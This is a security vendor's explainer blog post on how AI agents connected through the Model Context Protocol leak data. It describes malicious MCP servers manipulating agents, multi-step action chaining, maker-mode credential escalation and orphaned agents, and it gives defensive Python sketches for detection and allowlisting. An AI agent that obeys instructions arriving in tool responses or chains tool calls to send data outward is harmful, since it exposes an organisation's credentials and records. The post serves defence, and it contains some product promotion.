Runtime Truth
Threat Explainer

MCP Data Exfiltration: How AI Agents Leak Data Through Tool Calls

AI agents leak data through MCP tool calls at machine speed. Learn how action chaining and maker mode bypass IAM controls, and why runtime visibility is the only fix.

Obsidian Editorial Team · Security Research · Obsidian Security
May 18, 2026
May 28, 2026
Key Takeaways
  • AI agents move 16 times more data than human users.
  • Most security teams have no visibility into where that data goes.
  • That gap is not a configuration problem.
  • An agent connected to a Model Context Protocol (MCP) server can push data to external endpoints, unsanctioned destinations, and third-party services through ordinary tool calls.
  • None of that movement appears in a static configuration review.
  • None of it triggers a traditional DLP alert.

What MCP Is and Why It Creates an Exfiltration Surface

Security teams managing AI deployments face a question they cannot currently answer: what tools does each agent have access to, and what is the agent actually doing with them?

MCP, the Model Context Protocol, is an open standard that connects AI agents to external tools, data sources, and services. It acts as the integration layer between an agent's reasoning capability and the real-world systems it can act on. A growing share of enterprise AI deployments now connect to their tools and data through MCP, making it a dominant protocol for agentic connectivity.

The exfiltration surface emerges from a structural property of MCP's trust model. Tool descriptions are typically reviewed once, when a client connects to a server and lists its tools. The protocol does not validate tool responses during execution. That means an agent operating through an MCP server connection can receive instructions from a tool, act on those instructions, and move data outward, all without any runtime check confirming that the destination is authorized.

The share of "action" tools in MCP usage, tools that write, send, or move data rather than just read, has risen as the ecosystem matures. More action tools mean more opportunities for data to move. More movement means a larger blast radius when something goes wrong.

The foundational problem is straightforward: the MCP connection exists in configuration. The data movement only exists at runtime. Understanding what AI agents are actually doing requires observing them while they operate, not reviewing how they were set up.

The MCP Data Exfiltration Mechanism: How Tool Calls Move Data

Security teams reviewing agent configurations see what an agent is authorized to do. They do not see what the agent is doing right now, or what it did three hours ago.

Here is the mechanism that creates MCP data exfiltration risk. An agent receives a task. It connects to an MCP server to execute that task. The MCP server exposes tools: functions the agent can call to retrieve data, write to systems, send messages, or interact with external APIs. The agent calls those tools in sequence. Each tool call can carry data as a parameter, as a payload, or as a response that gets forwarded to the next tool in the chain.
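
To make the mechanism concrete, here is a minimal sketch of two chained calls. The request shape follows the JSON-RPC 2.0 `tools/call` method that MCP uses; the tool names (`crm_lookup`, `send_webhook`), the URL, and the record contents are hypothetical and exist only for illustration.

```python
import json
from itertools import count

_ids = count(1)  # simple request-id generator for the sketch

def tool_call_request(tool_name, arguments):
    """Build a JSON-RPC 2.0 request in the shape MCP uses for tools/call."""
    return {
        "jsonrpc": "2.0",
        "id": next(_ids),
        "method": "tools/call",
        "params": {"name": tool_name, "arguments": arguments},
    }

# Hypothetical first call: read a record from an internal system.
read_req = tool_call_request("crm_lookup", {"account_id": "A-1001"})

# Stand-in for the result the agent would receive from that tool.
read_result = {"account_id": "A-1001", "contact_email": "jane@example.com"}

# Hypothetical second call: the previous result rides along as an ordinary argument.
send_req = tool_call_request(
    "send_webhook",
    {"url": "https://hooks.example.net/notify", "body": json.dumps(read_result)},
)

print(json.dumps(send_req, indent=2))
```

Nothing in the second request marks it as an exfiltration event. It is a well-formed tool call whose argument happens to contain data read one step earlier.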

None of those individual tool calls requires the agent to "know" it is moving data outward. The agent is executing its task. The data movement is a side effect of how the tool is configured or, in adversarial scenarios, how a malicious MCP server has been designed to manipulate the agent's behavior.

Malicious MCP servers can manipulate AI agents into surfacing sensitive information, including credentials and secrets, by exploiting the gap between what a tool claims to do and what it actually executes. The agent trusts the tool description. The tool description does not have to match the tool's behavior.
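
One way to catch secrets riding inside a tool call is to scan the call's arguments before they leave. The sketch below is an illustration under stated assumptions, not a complete detector: it checks only two well-known patterns (the AWS access key ID prefix and a PEM private-key header), and the function name `find_secrets` is hypothetical.

```python
import json
import re

# Illustrative patterns only; real secret detection needs a much broader rule set.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}

def find_secrets(arguments):
    """Return the names of patterns that match anywhere in the call arguments."""
    blob = json.dumps(arguments)  # flatten nested arguments into one string
    return sorted(name for name, pat in SECRET_PATTERNS.items() if pat.search(blob))

# Hypothetical outbound tool-call arguments, using AWS's documented example key.
outbound = {"url": "https://hooks.example.net/notify",
            "body": {"note": "key=AKIAIOSFODNN7EXAMPLE"}}

print(find_secrets(outbound))
```

A check like this inspects what the call carries rather than what the tool description claims, which is the gap the paragraph above describes.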

The result is a data movement event that:

  • Happens at machine speed, not human speed
  • Produces no alert in traditional DLP systems
  • Does not appear in SaaS audit logs as an unauthorized access event
  • Looks, from a configuration perspective, like normal agent operation

One enterprise discovered that an AI-powered coding assistant had been quietly moving credentials to an external endpoint for weeks before the activity was identified. The configuration showed an authorized MCP connection. The runtime showed a sustained leak. Stopping data movement threats early requires catching this activity before it compounds.

Action Chaining: How Limited Agents Reach Broad Data

Security teams assume that a low-privilege agent has a limited blast radius. Action chaining breaks that assumption.

Action chaining is the mechanism by which an agent sequences multiple tool calls across systems, compounding its access with each step. A limited-permission agent does not need direct access to sensitive data if it can call a tool that connects to a higher-permission MCP server, which in turn has access to that data.

The sequence looks like this:

| Step | Agent Action | Data Exposure |
|------|--------------|---------------|
| 1 | Agent calls a file-retrieval tool | Accesses document index |
| 2 | Tool response includes a reference to a connected data store | Agent now has a pathway to the store |
| 3 | Agent calls a data-export tool on the connected MCP server | Retrieves records from the broader store |
| 4 | Agent forwards output to an external notification tool | Data leaves the environment |

Each individual step looks authorized. The chain, taken together, represents unauthorized data access and outbound movement. No single tool call triggers a policy violation. The violation is the sequence.
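
The difference between per-call and sequence-level inspection can be sketched in a few lines. Everything here is hypothetical: the `ToolCall` fields, the `kind` labels, and the single rule "an external send that follows an export" are simplifying assumptions chosen to mirror the sequence above.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ToolCall:
    tool: str
    kind: str        # "read", "export", or "send" (hypothetical labels)
    external: bool   # True if the call's destination is outside the environment

def per_call_violations(calls, allowed_tools):
    """Per-call inspection: flag only calls to tools the agent may not use."""
    return [c for c in calls if c.tool not in allowed_tools]

def chain_violation(calls):
    """Sequence inspection: flag an external send that follows an export."""
    exported = False
    for c in calls:
        if c.kind == "export":
            exported = True
        elif c.kind == "send" and c.external and exported:
            return True
    return False

chain = [
    ToolCall("file_retrieval", "read", False),
    ToolCall("data_export", "export", False),
    ToolCall("notify_external", "send", True),
]
allowed = {"file_retrieval", "data_export", "notify_external"}

print(per_call_violations(chain, allowed))  # per-call view of the chain
print(chain_violation(chain))               # sequence view of the same chain
```

The per-call check finds nothing because every tool is on the allowed list. Only the check that carries state across calls sees the export followed by the outbound send.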

AI agent monitoring cannot rely on per-call inspection alone. Effective authority, meaning what the agent can actually reach through its full tool-call graph, is at least as large as its configured permissions suggest and is usually larger. The blast radius of a chained agent is not the blast radius of its direct permissions. It is the blast radius of every tool it can reach.
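
Effective authority can be treated as graph reachability. The sketch below assumes a hypothetical tool-call graph (the node names are invented for illustration) and uses a breadth-first search to compare what the agent reaches directly with what it reaches through chained calls.

```python
from collections import deque

# Hypothetical graph: each node lists what it can reach in one tool call.
TOOL_GRAPH = {
    "agent": ["file_retrieval"],
    "file_retrieval": ["document_index", "connected_store_ref"],
    "connected_store_ref": ["data_export"],
    "data_export": ["customer_records"],
    "document_index": [],
    "customer_records": [],
}

def effective_reach(graph, start):
    """Return every node reachable from start, excluding start itself."""
    seen, queue = {start}, deque([start])
    while queue:
        node = queue.popleft()
        for nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen - {start}

direct = set(TOOL_GRAPH["agent"])            # what configuration shows
reach = effective_reach(TOOL_GRAPH, "agent")  # what chaining allows

print(sorted(direct))
print(sorted(reach))
```

In this toy graph the agent is configured with a single tool, yet `customer_records` sits inside its reachable set.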

Agents operating in maker mode compound this further. When an agent runs on the creator's embedded credentials, every tool call in the chain executes at the creator's privilege level, regardless of who invoked the agent. A user without Salesforce access can trigger an agent that, through action chaining across MCP tools, retrieves and exports CRM records the user was never authorized to see.
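
A maker-mode escalation shows up as the difference between two entitlement sets. This is a minimal sketch under assumptions: the function name, the entitlement labels, and the idea that entitlements are available as flat sets are all hypothetical simplifications.

```python
def maker_mode_escalations(invoker_entitlements, maker_entitlements, resources_touched):
    """Resources reached via the maker's credentials that the invoker lacks."""
    return sorted(
        r for r in resources_touched
        if r in maker_entitlements and r not in invoker_entitlements
    )

invoker = {"wiki"}                    # what the invoking user may access
maker = {"wiki", "salesforce_crm"}    # what the agent creator's credentials allow
touched = ["wiki", "salesforce_crm"]  # what the agent reached during the run

print(maker_mode_escalations(invoker, maker, touched))
```

Any non-empty result means the invoker received data through the agent that their own permissions would not have granted.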

Obsidian maps the full tool-call graph for each agent in your environment, surfacing blast radius and action chaining across Salesforce Agentforce, Amazon Bedrock, Microsoft Copilot Studio, and other supported platforms, with no per-SaaS connector required.

Why Configuration-Based Tools Miss MCP Data Exfiltration

Security teams doing their due diligence review agent configurations. They check OAuth scopes, review connector settings, and confirm that MCP servers are on an approved list. That work is necessary. It is not sufficient.

Configuration is not reality.

The tools inside an MCP server are only visible at runtime. A configuration review tells you that an MCP server is connected. It does not tell you which tools that server exposes, what those tools actually do when called, or where the data they handle goes. A large share of enterprise MCP connections operate without any runtime inspection layer between the agent and the tools it reaches.

This is the ghost-chasing problem. Security teams review theoretical configuration signals: this MCP server could be exploited, this connector exists, this scope is broad. They have no runtime evidence of what actually happened. They cannot answer the questions that matter: Was it used? Who triggered it? What data was accessed? Did it succeed?

Traditional security controls fail here for three specific reasons:

  • Network and endpoint tools cannot see AI agent tool calls across SaaS applications. The traffic looks like authorized API activity.
  • Native platform logs exist but are siloed per tenant, require manual correlation, and do not capture the cross-system data movement that action chaining produces.
  • Identity and access management controls govern what the agent is configured to access, not what it actually reached through a chained tool-call sequence.

The architecture gap in agent security is precisely this: the layer between agent configuration and agent runtime behavior has no owner in most enterprise security programs.

The Machine Insider Risk Hidden in Every MCP Connection

Every AI agent connected to an MCP server holds credentials. It holds tokens. It operates continuously, without the behavioral patterns that human insider risk programs use to detect anomalies. It is, in every functional sense, a machine insider.

Machine insider risk is the category that existing security programs do not cover. Insider risk programs are built around human behavior: unusual login times, large file downloads, access to systems outside a user's normal scope. AI agents violate every one of those assumptions. They operate at all hours. They move data at machine speed. They access systems across platforms in sequences that no human user would replicate.

The non-human identity problem compounds this. Agents inherit credentials from their creators, from OAuth grants, from hardcoded secrets in workflow configurations. Those credentials persist after the creator leaves the organization. Orphaned agents, agents whose owner accounts are disabled but whose MCP connections remain active, continue executing tool calls with inherited credentials. The blast radius of an orphaned agent connected to an MCP server with broad data access is not theoretical. It is active and ongoing.

One practical question every security team should be able to answer: how many active MCP connections in your environment belong to agents whose owners no longer work at the company? Most teams cannot answer that question. The answer is rarely zero.
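
Answering that question is a join between an agent inventory and the current employee directory. The sketch below assumes both are already available as simple Python structures; the `AgentConnection` fields and all names in the sample data are hypothetical.

```python
from dataclasses import dataclass

@dataclass
class AgentConnection:
    agent: str
    owner: str
    mcp_server: str
    active: bool

def orphaned_connections(connections, active_employees):
    """Active MCP connections whose owning account is no longer an active employee."""
    return [c for c in connections if c.active and c.owner not in active_employees]

inventory = [
    AgentConnection("report-bot", "alice", "mcp-finance", True),
    AgentConnection("sync-bot", "bob", "mcp-crm", True),
    AgentConnection("old-bot", "bob", "mcp-files", False),
]
employees = {"alice"}  # bob has left the company in this example

for c in orphaned_connections(inventory, employees):
    print(c.agent, c.mcp_server)
```

The hard part in practice is building the inventory, not running the query.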

Toxic combinations make this worse. An orphaned agent with an MCP connection to an unsanctioned external endpoint, running on maker mode credentials with admin-level access, represents a critical-severity risk from three compounding factors. Any one of those factors alone is medium severity. Together, they create the conditions for a sustained, undetected MCP data exfiltration event.
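
The compounding can be expressed as a simple scoring rule. In this sketch, the factor names are hypothetical labels for the three conditions above. The text states only that one factor is medium and all three together are critical, so the "high" rating for two factors and "none" for zero are assumptions added to complete the scale.

```python
RISK_FACTORS = ("orphaned", "unsanctioned_endpoint", "maker_mode_admin")

# One factor = medium and three = critical come from the text above;
# the "none" and "high" levels are assumed for illustration.
SEVERITY_BY_COUNT = {0: "none", 1: "medium", 2: "high", 3: "critical"}

def severity(agent_flags):
    """Map the number of risk factors present on an agent to a severity label."""
    present = sum(1 for f in RISK_FACTORS if agent_flags.get(f))
    return SEVERITY_BY_COUNT[present]

print(severity({"orphaned": True}))
print(severity({"orphaned": True, "unsanctioned_endpoint": True, "maker_mode_admin": True}))
```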

This framing is consistent with OWASP's emerging guidance on agentic AI risks and with the governance controls in the NIST AI RMF that apply to non-human identities.

Runtime Truth: What Effective Visibility Into MCP Tool Calls Looks Like

The solution to MCP data exfiltration is not a broader configuration review. It is runtime visibility into what agents are actually doing through their tool calls.

Runtime truth means observing every tool call an agent makes, correlating that call with the agent's identity, the invoker's identity, the destination of the data, and the effective authority the agent holds across every connected system. It means seeing the action chain, not just the individual step. It means knowing whether the data that moved was authorized to move, based on what the agent can actually access, not what its configuration says it should access.

Effective visibility into MCP tool-call data flows requires a single pane of glass across every agent platform, not a per-platform dashboard that requires manual correlation. It requires correlating agent configuration with actual SaaS entitlements, so that the effective authority of each agent is known before an incident occurs, not reconstructed afterward.

For security teams building toward AI agent governance, the operational requirements are:

  • MCP server inventory. Know every MCP server connected to every agent, sanctioned and unsanctioned, before reviewing tool-call behavior.
  • Tool-call visibility at runtime. See every tool an agent calls, every parameter it passes, and every destination it reaches, in real time.
  • Action chain correlation. Map multi-step tool sequences to understand the full blast radius of each agent's activity, not just its direct permissions.
  • Identity correlation. Connect the agent's runtime behavior to the invoker's identity and the maker's credentials, flagging privilege escalation when a user reaches data they should not be able to access.
  • Deterministic guardrails. Apply fixed, predictable enforcement rules to probabilistic agents. Detection without enforcement is expensive logging. Probabilistic agents require deterministic guardrails that cut off unauthorized action chains before they complete.
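
As an illustration of the last requirement, a deterministic guardrail can be as simple as a fixed destination allowlist evaluated on every call. This is a sketch, not a product behavior: the `enforce` function, the allowlisted host, and the assumption that outbound destinations appear in a `url` argument are all hypothetical.

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"api.internal.example.com"}  # hypothetical sanctioned destinations

def enforce(tool_call):
    """Return 'allow' or 'block' for a call based on a fixed host allowlist."""
    url = tool_call.get("arguments", {}).get("url")
    if url is None:
        return "allow"  # no outbound destination in this call
    host = urlparse(url).hostname  # None for malformed or scheme-less URLs
    return "allow" if host in ALLOWED_HOSTS else "block"

calls = [
    {"name": "crm_lookup", "arguments": {"account_id": "A-1001"}},
    {"name": "post_report", "arguments": {"url": "https://api.internal.example.com/v1/reports"}},
    {"name": "send_webhook", "arguments": {"url": "https://hooks.example.net/notify"}},
]

for call in calls:
    print(call["name"], enforce(call))
```

The rule gives the same answer for the same input regardless of how the agent reasoned its way to the call, which is the property that makes it a guardrail rather than a detection.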

For any enterprise deploying MCP-connected agents, the evaluation should start with runtime visibility, not configuration review. Configuration tells you what was intended. Runtime tells you what happened.
